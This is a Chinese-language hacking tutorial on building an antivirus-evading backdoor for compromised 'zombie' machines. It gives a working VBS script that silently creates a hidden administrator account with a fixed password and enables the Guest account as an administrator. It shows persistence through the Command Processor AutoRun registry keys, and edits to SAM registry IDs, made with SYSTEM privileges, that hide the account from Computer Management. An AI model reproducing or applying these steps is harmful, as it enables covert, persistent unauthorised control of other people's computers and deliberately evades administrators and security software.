打造杀毒软件PASS的后门

爲眀天活着

分解后门查核心——打造杀毒软件PASS的后门




在安全观念日益强化的今天，想得到台属于自己的肉鸡是不易的，如果说因为管理员发现了自己留在肉鸡上的 后门账号而导致肉鸡丢失的话，那就是世间最痛苦的事了，相信大家都不会希望这种事情发生在自己的身上吧！这时候用什么后门来控制肉鸡就成为最让人头疼的问 题，而好后门的关键就在于是否会被查杀，下文一起来看看如何打造出自己的免查杀后门吧！

Superdoor3.0这款软件大家都用过或者听过吧？它只有一个可执行程序，文件本身很 小，命令简单。运行后，可以起到隐藏账号的效果，管理员在CMD下用“net user”查看用户账号，或者用计算机管理来维护用户账号时，账号都会自动隐藏。使用方法也特别简单，只需要键入如下命令就行了：
door <用户名>：<口令>
小提示：Superdoor3.0(超级后门3.0)，超级用户隐藏器。
运行环境：测试2000通过（须VB运行库）。
运行方法：door <用户>:<密码>例：administrator:123。
功能：它在打开“计算机管理”和CMD时把用户删掉，管理员看过用户后，关闭“计算机管理”或CMD时，用户又回来了，巧妙地躲开管理员的查看，是宝鸡必备良药。
不过使用这个后门建立隐藏帐户容易，后门被发现也很容易。我使用杀毒软件（Norton Anti Virus）查了一下。在/winnt/system32/下会生成一个Cmd.exe文件和感染Conpmgmt.exe文件。

哎，看来Superdoor早就被列入杀毒名单了。而且在杀毒软件将后门程序删除后，再运行CMD命令行回在它上面多出一句：“c:\WINNT\system32\crnd.exe"不是外部或内部命令，也不是可运行的程序或批处理文件”。
看来是文件关联被动了手脚了。经过查找，发现程序写入下面两个键值：
HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\下的\Software\Microsoft\Command Processor\Auto Run
先 看看这两个位置的介绍：如果/D未在命令行上被指定，当Cmd.exe运行时，它会自动寻找以下Reg_sz/reg_expand_sz注册表变量。如 果其中一个或两个都存在，这两个变量会先予执行。也就是说，只要启动了CMD就会运行上述的脚本，可以说是CMD关联吧。
达到“账号如果被撤除，运行CMD又恢复”的效果，原理就是这样的了。现在我们来根据原理做个不被杀的后门。先建立一个名字为RUN的VBS文件，保存在C:/winnt/system32/下，内容如下：
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user hsmw$Content$nbsp;QQ26836659",0
wsh.run "net localgroup administrators hsmw$Content$nbsp;/add",0
wsh.run "net user guest /active:yes",0
wsh.run "net user guest QQ26836659",0
wsh.run "net localgroup administrators hsmw$Content$nbsp;/add",0
上面一段VBS的意思就是建立个hsmw$的账号，并且加为高级管理组，设置密码为QQ26836659，激活Guest账号，并且加为高级管理组，设置密码为QQ26836659。写入注册表中下面的键，关联CMD达到不死的效果：
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\Auto Run
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\Auto Run
小提示：在账号后面加入$是为了在输入“net user”时不被轻易地发现，虽然是个“不死账号”，但是在计算机管理可以轻易的查到。
我们添加完例如“?$”这样账号以后，在注册表中找到这个有字符“$账号”对应的ID值，具体的位置在：
KEY_LOCAL_MACHINE\SAM\SAM\ Domains\Account\User
将有字符$账号对应的ID的键值修改为一个不存在的ID键值。例如：某账号的键值为0x4eb，修改为0x6eb，那么这个含有字符$的账号就没有ID了，重新启动后，用户管界面里也就看不到这个账号了！
这 里需要注意一点，要打开注册表中的SAM需要System权限，Admin权限是不行的，不过不要着急。这里我们可以用Psu这个软件轻松提升权限，先用 Pslist查看Winlogon.exe的PID值为212，然后输入“Psu -p regedit -i 212”就可以了。
好了，前面的VBS的功能是在CMD下用“net user命令”看不见，后者是在计算机管理里看不见，结合起来一个新的后门出世了，用杀毒软件来查一查：PASS！哈哈，成功！
有不足之处，还请赐教，谢谢！